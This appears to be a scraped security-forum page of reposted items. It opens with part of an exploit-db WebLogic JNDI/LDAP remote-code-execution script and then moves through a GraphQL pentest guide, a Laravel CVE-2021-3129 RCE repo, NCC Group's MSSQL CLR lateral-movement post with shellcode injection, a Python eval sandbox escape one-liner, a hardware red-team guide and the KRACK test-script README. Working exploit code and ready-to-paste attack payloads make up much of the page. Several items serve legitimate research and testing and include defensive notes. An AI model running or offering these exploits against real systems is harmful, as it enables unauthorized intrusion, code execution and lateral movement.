    else: exit('[-] Authentication Denied')
    ## Launch the LDAP listener and retrieve the random endpoint value
    sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose)
    if bVerbose: print('[+] Got Java value: ' + sRandom)
    ## This is the actual vulnerability: retrieve LDAP data from the victim, which then runs on the victim; it bypasses verification because the IP is written as "127.0.0;1" instead of ""
    print('\n[+] Firing exploit now, hold on')
    ##;10:1389/5r5mu7;AdminServer-)
    sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3]
    sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)'
    if bVerbose: print('[!] Using URL ' + sFullUrl)
    oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    time.sleep(5)
    bExploitWorked = False
    for line in oRun.stdout:
        if 'Log a request' in line: bExploitWorked = True
        if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim')
    if not bExploitWorked: print('[-] Exploit failed, victim likely patched')
    else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)')
    if bVerbose: print(oRun.stderr)
    endIt()

if __name__ == "__main__":
    try: main()
    except KeyboardInterrupt: endIt()

Sursa: https://www.exploit-db.com/exploits/49461
    • Pentest applications with GraphQL
6 min · by proger

Recently GraphQL has been gaining more and more popularity, and with it the interest of information security specialists is growing. The technology is used by companies such as Facebook, Twitter, PayPal and GitHub, which means it's time to figure out how to test this API. In this article we will talk about the principles of this query language and approaches to penetration testing applications that use GraphQL.

Why do you need to know GraphQL?
This query language is actively developing, and more and more companies are finding practical applications for it. Its popularity is also growing within Bug Bounty programs; interesting examples can be found here, here and here.

Training
A test site where you will find most of the examples given in the article. A list of applications that you can also use for study. To interact with various APIs, it is convenient to use an IDE for GraphQL:
Graphql-playground
Altair
Insomnia

We recommend the last of these: Insomnia has a convenient and simple interface, many settings and autocompletion of query fields. Before going directly to the general methods of analyzing the security of applications that use GraphQL, let us recall the basic concepts.

What is GraphQL?

GraphQL is a query language for APIs designed to provide a more efficient, powerful and flexible alternative to REST. It is based on declarative data fetching: the client can specify exactly what data it needs from the API. Instead of multiple API endpoints (REST), GraphQL exposes a single endpoint that provides the client with the requested data.

The main differences between REST and GraphQL

Usually in a REST API you need to get information from different endpoints. In GraphQL, to get the same data, you make one query indicating the data you want to receive.
A REST API provides the information that the developer exposes in the API; if you need more or less information than the API offers, additional requests will be needed. Again, GraphQL returns exactly the requested information. A useful addition is that GraphQL has a schema that describes how and what data a client can receive.

Types of requests

There are 3 main operation types in GraphQL: query, mutation and subscription.

Query
Query operations are used to get/read data from the schema. An example of such a request:

query {
  allPersons {
    name
  }
}

In the request we indicate that we want to get the names of all users. In addition to the name, we can specify other fields: age, id, posts, etc. To find out which fields we can get, press Ctrl + Space. In this example, we pass a parameter with which the application returns the first two entries:

query {
  allPersons (first: 2) {
    name
  }
}

Mutation
If the query type is needed for reading data, then the mutation type is needed for writing, deleting and modifying data in GraphQL. An example of such a request:

mutation {
  createPerson (name: "Bob", age: 37) {
    id
    name
    age
  }
}

In this request, we create a user with the name Bob and age 37 (these parameters are passed as arguments); in the nested selection (curly brackets) we indicate what data we want to get from the server after creating the user. This is necessary in order to confirm that the request was executed successfully, as well as to obtain data that the server generates itself, such as id.

Subscription
Another operation type in GraphQL is subscription. It is needed to notify clients of any changes in the system. It works like this: the client subscribes to an event, after which a connection is established with the server (usually via WebSocket), and when this event occurs, the server sends a notification to the client via the established connection.
Example:

subscription {
  newPerson {
    name
    age
    id
  }
}

When a new Person is created, the server will send information to the client. Subscription operations are less common in schemas than query and mutation. It is worth noting that all the capabilities for query, mutation and subscription are created and configured by the developer of a specific API.

Optional

In practice, developers often use aliases and OperationName in queries for clarity.

Alias
GraphQL provides aliases for queries, which can make it easier to understand what exactly the client requests. Suppose we have a query of the form:

{
  Person (id: 123) {
    age
  }
}

which will display the age of the user with id 123. Let the name of this user be Vasya. In order not to puzzle over what this request returns next time, you can do this:

{
  Vasya: Person (id: 123) {
    age
  }
}

OperationName
In addition to aliases, GraphQL supports OperationName:

query gettingAllPersons {
  allPersons {
    name
    age
  }
}

OperationName is needed to clarify what the query is doing.

Pentest

Now that we have dealt with the basics, let's go directly to the pentest. How do you tell that an application uses GraphQL?
Here is an example of a request containing a GraphQL query:

POST /simple/v1/cjp70ml3o9tpa0184rtqs8tmu/ HTTP/1.1
Host: api.graph.cool
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://api.graph.cool/simple/v1/cjp70ml3o9tpa0184rtqs8tmu/
content-type: application/json
Origin: https://api.graph.cool
Content-Length: 139
Connection: close

{"operationName":null,"variables":{},"query":"{\n __schema {\n mutationType {\n fields {\n name\n}\n}\n}\n}\n"}

Some signs by which you can tell that GraphQL is in front of you, and not something else:
the request body contains words such as __schema, fields, operationName, mutation, etc.;
the request body contains many "\n" sequences (as practice shows, they can be removed to make the request easier to read);
requests are often sent to an endpoint such as /graphql.

Great, found and identified. But where do we insert a quote? How do we find out what we have to work with? Introspection comes to the rescue.

Introspection

GraphQL provides an introspection schema, i.e. a schema describing the data that we can get. Thanks to this, we can find out what requests exist, what arguments can/should be passed to them, and much more. Note that in some cases developers intentionally disable introspection of their application; nevertheless, the majority still leave it enabled. Consider the basic query examples.

Example 1. Getting all types of requests

query {
  __schema {
    types {
      name
      fields {
        name
      }
    }
  }
}

We form a query operation, specifying that we want to receive data on __schema, and within it the types, their names and fields.
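Responses to the introspection query above are plain JSON, so they are easy to post-process. Below is a minimal sketch (the function name and response layout are my own assumptions, shaped after the Example 1 query, not part of the article) that maps each type name to its field names:

```python
def schema_overview(introspection: dict) -> dict:
    """Map each type name to its field names, given a JSON response
    to the Example 1 introspection query ({"data": {"__schema": ...}})."""
    overview = {}
    for t in introspection['data']['__schema']['types']:
        # Scalar types come back with "fields": null, so default to [].
        fields = t.get('fields') or []
        overview[t['name']] = [f['name'] for f in fields]
    return overview
```

Dumping such an overview at the start of a test gives you the full attack surface to iterate over.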
In GraphQL there are utility names: __schema, __typename, __type. In the answer we will receive all types of requests, their names and the fields that exist in the schema.

Example 2. Getting fields for a specific operation type (query, mutation, subscription)

query {
  __schema {
    queryType {
      fields {
        name
        args {
          name
        }
      }
    }
  }
}

The answer to this query will be all possible queries that we can execute against the schema to get data (the query type), and the possible/required arguments for them. For some queries an argument is required; if you execute such a request without specifying a required argument, the server should return an error message saying that you need to specify it. Instead of queryType, we can substitute mutationType and subscriptionType to get all possible mutations and subscriptions, respectively.

Example 3. Getting information about a specific type

query {
  __type (name: "Person") {
    fields {
      name
    }
  }
}

Thanks to this request, we get all the fields of the Person type. As an argument, instead of Person, we can pass any other type name. Now that we understand the general structure of the application under test, let's determine what we are looking for.

Information disclosure
Most often, an application using GraphQL consists of many fields and operation types, and, as many know, the larger and more complex the application, the harder it is to configure and monitor its security. That is why careful introspection can turn up something interesting: for example, users' full names, their phone numbers and other critical data. If you want to find something similar, we recommend checking all possible fields and arguments of the application. During one pentest, user data was found in one of the applications: name, phone number, date of birth, some card data, etc.
Example:

query {
  User (id: 1) {
    name
    birth
    phone
    email
    password
  }
}

By iterating through id values, we may be able to get information about other users (or maybe not, if everything is configured correctly).

Injections
Needless to say, almost everywhere there is work with large amounts of data, there are also databases. And where there is a database, there may be SQL injections, NoSQL injections and other types of injection. Example:

mutation {
  createPerson (name: "Vasya '- +") {
    name
  }
}

Here is an elementary SQL injection attempt in a query argument.

Authorization bypass
Suppose we can create users:

mutation {
  createPerson (username: "Vasya", password: "Qwerty1") {
  }
}

Assuming that there is a certain isAdmin parameter in the handler on the server, we can send a request of the form:

mutation {
  createPerson (username: "Vasya", password: "Qwerty1", isAdmin: True) {
  }
}

and make the user Vasya an administrator.

DoS

In addition to its stated convenience, GraphQL has its own security flaws. Consider an example:

query {
  Person {
    posts {
      author {
        posts {
          author {
            posts {
              author ...
            }
          }
        }
      }
    }
  }
}

As you can see, we have created a looped subquery. With a large number of such nestings, for example 50 thousand, we can send a request that will be processed by the server for a very long time, or will "drop" it altogether. Instead of processing valid requests, the server will be busy unpacking the giant nesting of this dummy request. In addition to deep nesting, requests themselves can be "heavy": a single request with a lot of fields and nested selections may also be difficult for the server to process.
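To illustrate the nesting problem, here is a small sketch (the helper name is mine; the Person/posts/author fields mirror the looped example above) that generates a query of arbitrary nesting depth:

```python
def nested_dos_query(depth: int) -> str:
    """Build a deeply nested posts/author query like the DoS example above."""
    selection = 'name'
    for _ in range(depth):
        # Each round wraps the selection one level deeper.
        selection = 'posts { author { ' + selection + ' } }'
    return 'query { Person { ' + selection + ' } }'

# nested_dos_query(50000) yields a request the server has to parse and
# resolve through tens of thousands of nested selections.
```

Servers defend against exactly this with depth limits and query cost analysis, which is what you are probing for when you send such a request.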
If you are interested in this topic and want to study it more deeply, we recommend the following resources:
www.howtographql.com – the main resource for learning from scratch; in addition to theory, it contains practice.
www.graphql.com – also a good site to learn this technology.
www.howtographql.com/advanced/4-security – GraphQL security.
AppSecCali 2019 – An Attacker's View of Serverless and GraphQL Apps – a good video with concrete examples.

And don't forget: practice makes perfect. Good luck!

Sursa: https://prog.world/pentest-applications-with-graphql/
    • CVE-2021-3129 Laravel debug RCE

Usage
Run docker-compose up -d to start the environment.
Visit port 8888 and click "generate key" on the home page to reproduce the issue.

A few notes about the Docker environment:
Copying .env.example to .env enables the debug environment.
phar.readonly is disabled in php.ini.
A hello template that references an undefined variable was added in resources/view/, and a route for it was added in routes/web.php (I added this in the source code, not in the Dockerfile).

Reproduction
The script has been released; it must be placed in the same directory as the phpggc project folder.
It is not very universal (at least it works against my own environment); you can add phpggc's other RCE chains yourself to improve coverage.

References
https://www.ambionics.io/blog/laravel-debug-rce
https://xz.aliyun.com/t/9030#toc-3
https://blog.csdn.net/csdn_Pade/article/details/112974809

Sursa: https://github.com/SNCKER/CVE-2021-3129
    • MSSQL Lateral Movement
David Cash · Tool Release · January 21, 2021 · 5 Minutes

Using discovered credentials to move laterally in an environment is a common goal for the NCC Group FSAS team. The ability to quickly and reliably use a newly gained set of credentials is essential during time-constrained operations. This blog post explains how to automate lateral movement via MSSQL CLR without touching disk* or requiring XP_CMDSHELL, and how this can be prevented and detected.

*A DLL is still temporarily written to disk by the SQL Server process.

Post-exploitation of MSSQL services to achieve command execution commonly leverages the XP_CMDSHELL stored procedure to run operating system commands in the context of the MSSQL process. To run custom code using this technique, the use of LOLBINs, the addition of a new operating system user or a binary written to disk via BCP is usually required, all of which provide obvious detection opportunities.

The tool developed for this post (Squeak) can be found at: https://github.com/nccgroup/nccfsas/tree/main/Tools/Squeak

Leveraging CLR integration for command execution has been previously discussed in this presentation by Sensepost, but it has been automated here to improve the speed and reliability of the technique.

SQL Server CLR Integration

The ability to run .NET code from MSSQL was introduced in SQL Server 2005, with various protections overlaid in subsequent versions to limit what the code could access. A permission level is assigned to an assembly upon creation, for example:

CREATE ASSEMBLY SQLCLRTest
FROM 'C:\MyDBApp\SQLCLRTest.dll'
WITH PERMISSION_SET = SAFE;

The three options for a permission set are:
SAFE: essentially only exposes the MSSQL data set to the code, with the majority of other operations forbidden
EXTERNAL_ACCESS: opens up the potential to access certain resources on the underlying server but shouldn't permit direct code execution
UNSAFE: any code is permitted.
Detailed Microsoft documentation for SQL CLR is available at https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration. Code which satisfies the requirements to be marked as 'SAFE' can be run by simply enabling CLR, but several configuration changes, as well as DBA privileges, are required to run 'EXTERNAL_ACCESS' or 'UNSAFE' code. The initial steps required to run an 'UNSAFE' CLR differ for server versions before and after 2017; examples of both can be seen below:

Prior to SQL Server 2017

Show advanced options:
sp_configure 'show advanced options',1;RECONFIGURE

Enable CLR:
sp_configure 'clr enabled',1;RECONFIGURE;

Configure the database in which the assembly will be stored to be trustworthy:
ALTER DATABASE <CONNECTED DATABASE> SET TRUSTWORTHY ON;

Interestingly, the MSDB database appears to be granted TRUSTWORTHY permission by default, which may negate this requirement.

SQL Server 2017 and later

For SQL Server 2017 and above, strict security was introduced, which must also be disabled. Alternatively there is an option to specifically grant UNSAFE permission to an individual assembly based on the provision of its SHA512 hash, rather than marking a whole database as trusted. For SQL Server 2017 and above, the process would be as follows.
Show advanced options:
sp_configure 'show advanced options',1;RECONFIGURE

Enable CLR:
sp_configure 'clr enabled',1;RECONFIGURE;

Add the SHA512 hash of the assembly to the list of trusted assemblies:
sp_add_trusted_assembly @hash= <SHA512 of DLL>;

From this point, the creation and invocation of the assembly is the same for any SQL Server version. Create the assembly from a hex string (the ability to create the assembly from a hex string means that it is not necessary to create a binary file and write it to a location accessible by the SQL Server process):

CREATE ASSEMBLY clrassem from <HEX STRING> WITH PERMISSION_SET = UNSAFE;

Create a stored procedure to run code from the assembly:

CREATE PROCEDURE debugrun AS EXTERNAL NAME clrassem.StoredProcedures.runner;

Run the stored procedure:

debugrun

After the code has run, the stored procedure and assembly can be dropped, trusted hashes removed, and any modified security settings returned to normal. Examples of SQL queries to achieve this are shown below, although it should be noted that this doesn't take account of what the initial configuration of the security settings was.

For SQL Server 2017 and above:
sp_drop_trusted_assembly @hash=<SHA512 of DLL>

Prior to SQL Server 2017:
ALTER DATABASE <CONNECTED DATABASE> SET TRUSTWORTHY OFF;

All versions:
DROP PROCEDURE debugrun;
DROP ASSEMBLY clrassem;
sp_configure 'clr strict security',1;RECONFIGURE
sp_configure 'show advanced options',0;RECONFIGURE

At this point, the SQL Server process is executing any .NET code supplied to it, so leveraging this for lateral movement simply requires the construction of an appropriate DLL. As a proof of concept, a simple assembly that XORs some shellcode and injects it into a spawned process was produced.
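The two values that have to be derived from the compiled DLL — the hex string for CREATE ASSEMBLY and the SHA512 hash for sp_add_trusted_assembly — are easy to compute offline. A sketch (the function name is mine, not part of Squeak):

```python
import hashlib

def clr_assembly_literals(dll_bytes: bytes):
    """Return (hex literal for CREATE ASSEMBLY, SHA512 literal for
    sp_add_trusted_assembly) for a compiled CLR DLL."""
    assembly_hex = '0x' + dll_bytes.hex().upper()
    sha512_hex = '0x' + hashlib.sha512(dll_bytes).hexdigest().upper()
    return assembly_hex, sha512_hex
```

The first value is spliced into CREATE ASSEMBLY clrassem from <HEX STRING>, the second into sp_add_trusted_assembly @hash=<SHA512 of DLL>.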
To simplify the creation and invocation of CLR code, a GUI application was made that performs the following actions:
Collects connection string data
Reads in the shellcode bytes from a raw binary file and single-byte XORs them
Generates a MSSQL CLR DLL that XORs the shellcode, spawns a new process and injects the shellcode into it
Calculates the SHA512 hash of the DLL
Produces a single .NET executable with hard-coded arguments to execute the DLL via an SQL connection

The executable performs the following actions:
Creates an SQL connection
Checks the SQL Server version
Checks for DBA permissions
Checks and records existing security settings
Modifies security settings
Creates and runs the assembly
Restores security settings and deletes the assembly

The following screenshots show the process of generating a standalone executable with the connection string and CLR assembly embedded. The code for the CLR assembly is loaded from a file in the working directory, which can either be opened directly or edited from within the tool. Sample code is provided with the tool but has not been optimised to avoid detection. The generated executable can then be run against the target without any arguments:

C:\Users\user\Desktop>latmovemssqloutput.exe
Running with settings:
==========
Server:
Port: 55286
Database: msdb
User: dave
==========
Connection Open !
Microsoft SQL Server 2012 - 11.0.2100.60 (Intel X86)
Feb 10 2012 19:13:17
Copyright (c) Microsoft Corporation
Express Edition on Windows NT 6.2 <X64> (Build 9200: ) (WOW64) (Hypervisor)
Checking for DBA Privs
┌─┐
│1│
└─┘
Got DBA Privs!
Checking whether Advanced Options are already on.
│show advanced options│ 0│ 1│ 0│ 0│
Enabling advanced options
SQL Server is lower than 2017.
Checking CLR status ┌───────────────────────────────────────────────────────────┐ │clr enabled│ 0│ 1│ 1│ 1│ └───────────────────────────────────────────────────────────┘ CLR already enabled Dropping any existing assemblies and procedures SQL version is lower than 2017, checking whether trustworthy is enabled on the connected DB: ┌────┐ │True│ └────┘ Creating the assembly Creating the stored procedure Running the stored procedure. Sleeping before cleanup for: 5 Cleanup ======= Dropping procedure and assembly Disabling advanced options again Cleaned up... all done. The desired shellcode is run, in this instance establishing a Meterpreter session, although obviously any shellcode could be run: Code has been tested against the following SQL Server versions: Microsoft SQL Server 2019 (RTM) – 15.0.2000.5 (X64) Microsoft SQL Server 2017 (RTM) – 14.0.1000.169 (X64)  Microsoft SQL Server 2012 – 11.0.2100.60 (Intel X86) Detection and Response Minimising the exposure of database credentials and applying appropriate privilege management to SQL logins should mitigate against using the protocol to execute code on the underlying operating system. Failing this, there are several opportunities for detection of lateral movement using this technique: Anomalous SQL Server logins Auditing of suspicious transactions such as ‘CREATE ASSEMBLY’, or indeed any other part of the chain of SQL queries required. Actions performed by the DLL itself. In this instance, for example a CreateRemoteThread call from within .NET may trigger a detection The process of invoking an assembly via SQL commands also results in several identical files with different names being written to the temporary directory of the SQL service account. The following screenshot of Procmon shows the file being created and the .NET code being written to it. 
By adjusting file permissions to prevent files being deleted from the C:\Windows\Temp\ directory, it was possible to retrieve a copy of the file before it was deleted by the sqlservr.exe process. This could then be decompiled to reveal the original code: This gives an additional opportunity for static detection of malicious content, although the evidence is quickly removed after the assembly has executed.   Sursa: https://research.nccgroup.com/2021/01/21/mssql-lateral-movement/
    • Breaking Python 3 eval protections

📅 Jan 16, 2021 · ☕ 7 min read

Today I'm presenting some research I've done recently into the Python 3 eval protections. It's been covered before, but it surprised me to find that most of the info I could find was only applicable to earlier versions of Python and no longer works, or the suggested solutions would not work from an attacker perspective inside of eval, since you need to express them as a single statement. Since these break every so often, I've gone to some length to describe how I arrived at my conclusions, to hopefully proverbially 'teach you how to fish' so you can work out your own technique should any of the exact solutions I arrived at break in the future. I have also included a copy-and-paste section at the end if you're in a hurry.

Background

You can skip to the next section if you're pretty familiar with the inner and outer workings of eval already. In Python, the built-in command eval will dynamically execute any single statement provided to it as a string (exec is the same but supports multiple statements). It takes the following syntax: eval(expression[, globals[, locals]]). Of particular interest are the globals and locals parameters, because their purpose is to control which global and local variables the evaluated expression has access to. This is important because in Python, all built-in functions like print, __import__ (which can be used to import dangerous modules), enumerate, and even eval itself are provided through a global variable called __builtins__. When you reference a name as-is, this is where Python checks whether it is defined before it fails. This is easy to verify by checking for something which does not exist either as a function or a variable, like, say, 'potato': note that it gives an error message, then assign a potato function to the __builtins__ module, call it, and note that it works.
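The 'potato' experiment from the paragraph above can be reproduced in a few lines (using the builtins module, which is what the __builtins__ global normally points at):

```python
import builtins

# 1. An undefined bare name fails the local/global/builtins lookup chain.
try:
    potato  # noqa: F821 - deliberately undefined
except NameError:
    print('potato is not defined')

# 2. Attach a function to the builtins module and the bare name now resolves.
builtins.potato = lambda: 'it works'
print(potato())
```

This is also exactly why eval(expression, {'__builtins__': {}}, {}) appears safe: with the builtins mapping emptied, the same lookup chain finds nothing.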
As a way to make eval slightly safer, the idea is that you can clear this __builtins__ variable to prevent dangerous built-in functions from being launched. The typical (mis)use-case here from the perspective of a developer is needing to evaluate a mathematical expression like 2+2/5*8 without writing a complicated parser; simply using eval('2+2/5*8') is seen as an easy solution since it does the job. Thinking that it would be safe, they choose to code it as eval(input,{'__builtins__':{}},{}), reasoning that an attacker-controlled input variable would not be able to cause much harm since it can't use any of the dangerous built-in functions. This doubly so because eval does not allow you to run multiple statements at once. For example, running eval("1+1;1+1") and eval("1+1\n1+1") will both result in a syntax error and the eval will crash, since it's technically two statements.

The failure mode

You can recover all the built-in globals, even given none to begin with. You can also do this as a single (though convoluted) statement that will work within eval. In Python, almost everything is an object, by which we mean it inherits from a base class called 'object'. This includes modules, variables, variable types themselves, and functions. In Python, it is possible to traverse these inheritances vertically in both directions with special attributes like __class__, __base__ (up) and __subclasses__() (down). Because it is also possible to create the basic types implicitly with literals ([] for list(), {} for dict(), "" for str()), it is by extension possible, without access to any globals or locals, to declare variables whose inheritance stems from the 'object' class, then traverse upwards to the object class, then downward through its subclasses to find either the full uncleared built-ins themselves or modules that can be used to import further code (because modules also inherit from the object class).
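A quick way to convince yourself of this traversal: an empty list literal gives you a class, its base is object, and object's subclasses include importer classes such as BuiltinImporter (present in CPython 3). A sketch:

```python
# Start from a literal: no globals or builtins needed.
klass = [].__class__            # <class 'list'>
base = klass.__base__           # <class 'object'>
subclasses = base.__subclasses__()

# Among the subclasses of object are module/importer classes.
names = [c.__name__ for c in subclasses]
print(len(names), 'subclasses of object')
print('BuiltinImporter' in names)
```

The exact contents of the subclasses list vary between Python versions, which is why the one-liners in this article occasionally need adjusting.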
It's the latter method that I'll be sharing here.

Finding the builtins

Feel free to play with Python as you read this, but to give you an idea of the number of subclasses that exist for 'object', here's what my terminal dumps out when I run [].__class__.__base__.__subclasses__(): It's a lot. There are without a doubt multiple ways to go from this point just going by the sheer amount of juicy classes, but a simple way of proceeding that I discovered is to grab the 'BuiltinImporter' class from the list of subclasses, then instantiate it, import whatever module you want and have fun. Less words, more code:

# Trying to do anything up here would fail since the builtins are cleared.
for some_class in [].__class__.__base__.__subclasses__():
    if some_class.__name__ == 'BuiltinImporter':
        some_class().load_module('os').system('echo pwned')

The problem with the above is that it won't run if you place it in an eval, because it's multiple statements. It would work just fine in an exec statement, but let's keep going down this rabbit hole.

Turning it into a single statement

Your single biggest ally when converting Python code to a single statement is the list comprehension, because it is your closest single-statement equivalent when you need a for or while loop. Roughly speaking, the following code:

keep_these = []
for x in y:
    if CONDITION:
        keep_these.append(x)

can be expressed as:

[x for x in y if CONDITION]

This is handy because if you're looking for one exact element in an iterable, like how we're looking for BuiltinImporter in the object subclasses, you can do this:

[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]

to find that class lickety-split. This works because BuiltinImporter will always be in that subclasses list, and when the comprehension is done the only element of the list will be the found element.
It's worth noting that there's no equivalent of the 'break' statement in list comprehensions, so it's not technically the most efficient for loop for the purpose, since it doesn't stop when the element is found, but... eh, close enough. All we have to do then is instantiate it, call the load_module function, and presto, we've got a one-liner.

[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('os').system("echo pwned")

Tadaaa! Put this in any eval and watch the sparks fly. You can also call exec as a function under the 'builtins' module, like

[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('builtins').exec('INSERT CODE HERE',{'__builtins__':[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('builtins')})

to run arbitrary code without worry. Just looking at the one-liner gives me a headache, but basically you just want to assign the correct value to the builtins global for the exec function by using the globals parameter, the same way a developer would have to use it to clear it. For some reason it does not work to assign to __builtins__ directly before you call normal functions inside of exec (like __builtins__= ... ; do_stuff_here), which seems like a bug, but we're doing things to poor Python it was never meant to endure, so let's cut it some slack.

Copy-and-paste for the impatient

I don't judge, since we all got places to be and things to do, but consider reading up on the methodology I used to arrive at this code up above. The exact one-liner seems to break every so often between Python versions, but the technique is solid and you should be able to find your own variants on your own if you grasp how I arrived at these.
Single statement to bypass the cleared __builtins__ global and arbitrarily run os.system calls:

[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('os').system("echo pwned")

If you are really desperate to get exec to work (in case you need to launch a multi-line payload), you can do:

[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('builtins').exec('INSERT CODE HERE',{'__builtins__':[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'BuiltinImporter'][0]().load_module('builtins')})

But don't bill me for the aspirin you'll need from reading the one-liner.

Sursa: https://netsec.expert/posts/breaking-python3-eval-protections/
    • A Red Team Guide for a Hardware Penetration Test Part 2: Using security risks from the Modern Open Web Application Security Project to help hack hardware

Adam Toscher · 4 min read

This blog serves as a guide to help demystify some of the bugs and issues discovered during hardware assessments. I've shared some of the lessons learned from years of applying logic and reason to find problems that do not exist. This blog loosely maps some OWASP web application risks to hardware vulnerabilities from a red team perspective. Some may find the guide below more useful for IoT-based controls than for generalized hardware assessments.

OWASP Internet of Things Project
Oxford defines the Internet of Things as: "A proposed development of the Internet in which everyday objects have… wiki.owasp.org

I cover some other general ways to assess IoT devices in my previous article:
A Red Team Guide for a Hardware Penetration Test: Part 1
When looking at different routing and networking technology it's easy to be overwhelmed with how to assess an embedded… medium.com

By using the hash of another user, one could use that stored hash as a substitute for an admin's password. After retrieving the admin hash, the user has "root" access to the device.
The vendor's response to the customers, addressing the stored hash vulnerability

Broken Access Control
Summary: OWASP Top 10 Web Application Security Control: Broken Access Control
Red Team Technique Leveraged: pass the hash. The PtH technique is covered in my article below.
Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition)
Yes it's still easy to get Domain Admin "before lunch" as it was when I first started. medium.com

Any user could use the stored hash of an admin user, similar to the Windows attack.
This thought pattern came from my days of penetration testing Windows: passing the hash is a common technique there, but not one usually applied during the assessment of networking gear. By changing parameters passed to a CLI program, you can often abuse diagnostic utilities (ifconfig, ping, or tcpdump) to interact outside your jailed or sandboxed environment.

Injection

OWASP Top 10 Web Application Security Control: Injection

Red Team Technique Leveraged: the same as any other assessor's, lateral thinking. By fuzzing parameters it was possible to abuse diagnostic utilities like ifconfig and tcpdump and "inject" commands to interact with the underlying operating system.

Forced Browsing

Forced browsing's impact can range from informational to severe, depending on its use.

OWASP Top 10 Web Application Security Control: Broken Access Control

Red Team Technique Leveraged: the same as any other assessor's; attempt to leverage a known weakness to access sensitive information.

Security Misconfigurations

This is the most commonly seen issue across all devices and assets alike. It is commonly a result of insecure or default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, they must also be patched and upgraded in a timely fashion. From the most basic misconfiguration to the most elaborate, they're out there: bugs and major vulnerabilities residing on "secure" hardware platforms. Many "security" devices don't follow best security practices.

TL;DR

Sometimes you may not need to decap a chip; all you need is a keyboard, a monitor, and direct access to the underlying hardware.

Sursa: https://adam-toscher.medium.com/a-red-team-guide-for-a-hardware-penetration-test-9debc5e9e211
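The diagnostic-utility injection described above can be illustrated with a small sketch. The run_ping handler and its parameter are hypothetical, standing in for a device's CLI wrapper around ping:

```python
import subprocess

# Hypothetical sketch of the bug class: a diagnostic "ping" endpoint on
# the device splices a user-supplied parameter straight into a shell
# command line.
def run_ping(host: str) -> str:
    # VULNERABLE: shell=True lets ';' chain arbitrary extra commands
    proc = subprocess.run("ping -c 1 " + host, shell=True,
                          capture_output=True, text=True)
    return proc.stdout

# An attacker-controlled "host" escapes the intended utility and talks
# to the underlying operating system:
print(run_ping("127.0.0.1; echo INJECTED"))  # output contains INJECTED

# The usual fix is to skip the shell and pass arguments as a list, so
# the whole payload is treated as a single (invalid) hostname:
def run_ping_safe(host: str) -> str:
    proc = subprocess.run(["ping", "-c", "1", host],
                          capture_output=True, text=True)
    return proc.stdout
```

Swap ping for tcpdump or ifconfig and the shape is the same: the jailed utility is trusted, but the parameters fed to it are not.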
    • This project contains scripts to test if clients or access points (APs) are affected by the KRACK attack against WPA2. For details behind this attack see our website and the research paper. Remember that our scripts are not attack scripts! You will need the appropriate network credentials in order to test if an access point or client is affected by the KRACK attack.

21 January 2021: the scripts have been made compatible with Python 3 and have been updated to better support newer Linux distributions. If you want to revert to the old version, execute git fetch --tags && git checkout v1 after cloning the repository (and switch back to the latest version using git checkout research).

Prerequisites

Our scripts were tested on Kali Linux. To install the required dependencies on Kali, execute:

sudo apt update
sudo apt install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils virtualenv

Then disable hardware encryption:

cd krackattack
sudo ./disable-hwcrypto.sh

Note that if needed you can later re-enable hardware encryption using the script sudo ./reenable-hwcrypto.sh. It's recommended to reboot after disabling hardware encryption. We tested our scripts with an Intel Dual Band Wireless-AC 7260 and a TP-Link TL-WN722N v1 on Kali Linux.

Now compile our modified hostapd instance:

cd krackattack
./build.sh

Finally, to assure you're using compatible Python libraries, create a virtualenv with the dependencies listed in krackattack/requirements.txt:

cd krackattack
./pysetup.sh

Before every usage

Every time before you use the scripts you must disable Wi-Fi in your network manager. Then execute:

sudo rfkill unblock wifi
cd krackattack
sudo su
source venv/bin/activate

After doing this you can execute the scripts multiple times as long as you don't close the terminal.

Testing Clients

First modify hostapd/hostapd.conf and edit the line interface= to specify the Wi-Fi interface that will be used to execute the tests.
Note that for all tests, once the script is running, you must let the device being tested connect to the SSID testnetwork using the password abcdefgh. You can change the settings of the AP by modifying hostapd/hostapd.conf. In all tests the client must use DHCP to get an IP after connecting to the Wi-Fi network. This is because some tests only start after the client has requested an IP using DHCP!

You should now run the following tests, located in the krackattacks/ directory:

./krack-test-client.py --replay-broadcast. This tests whether the client accepts replayed broadcast frames. If the client accepts replayed broadcast frames, this must be patched first. If you do not patch the client, our script will not be able to determine if the group key is being reinstalled (because then the script will always say the group key is being reinstalled).

./krack-test-client.py --group --gtkinit. This tests whether the client installs the group key in the group key handshake with the given receive sequence counter (RSC). See section 6.4 of our follow-up research paper (https://papers.mathyvanhoef.com/ccs2018.pdf) for the details behind this vulnerability.

